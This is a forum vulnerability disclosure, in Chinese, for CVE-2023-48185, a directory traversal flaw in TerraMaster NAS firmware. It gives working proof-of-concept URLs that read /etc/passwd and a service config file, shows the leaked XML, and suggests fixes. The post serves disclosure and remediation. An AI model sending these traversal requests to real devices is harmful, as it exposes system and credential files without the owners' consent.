Headline
CVE-2023-48185: TerraMaster_S1.0_V2.295存在任意文件下载漏洞 - 国民专业级NAS --铁威马官方论坛
Directory Traversal vulnerability in TerraMaster v.s1.0 through v.2.295 allows a remote attacker to obtain sensitive information via a crafted GET request.
TerraMaster_S1.0_V2.295存在任意文件下载漏洞
漏洞详情
TERRA MASTER F2-NAS2中的系统版本≤TerraMaster_S1.0_V2.295时存在任意文件下载漏洞。通过该漏洞,可以读取存在于系统上的任意文件,希望厂商及时修复。
漏洞复现
http://[]:8181/cgi-bin/filemanage/download.php?file=%2Fetc%2Fpasswd
http://[]:8181/cgi-bin/filemanage/download.php?file=%2Fetc%2Fserviceconf.xml
文件内容:
<root>
<GLOBAL_PARAM LeafId="0">
<!-- GET_GLOBAL_INFO -->
<sName>monitor</sName>
</GLOBAL_PARAM>
<SERVER_PARAM LeafId="1">
<sSWITCH>on</sSWITCH>
<!-- GET_SERVICE_INFO -->
<sSERName>/usr/sbin/utelnetd</sSERName>
<sSERVERSTARTPARM>-p 23</sSERVERSTARTPARM>
<!-- 0:kill,1:start,2:monitor,3:start&monitor -->
<iOPERATIONTYPE>3</iOPERATIONTYPE>
<!-- the interval time of monitoring,such as 30 -->
<iINTERVALTIME>30</iINTERVALTIME>
<!-- reboot the service time,such as HH:MM -->
<sREBOOTTIME>00:00</sREBOOTTIME>
</SERVER_PARAM>
</root>
注意,即使将文件特别设置为644(guest禁止存取)但是仍然可以被guest下载。
修复方案
1. download.php在下载文件时加上鉴权逻辑。
2. 防止目录穿越,以mnt目录作为起始点。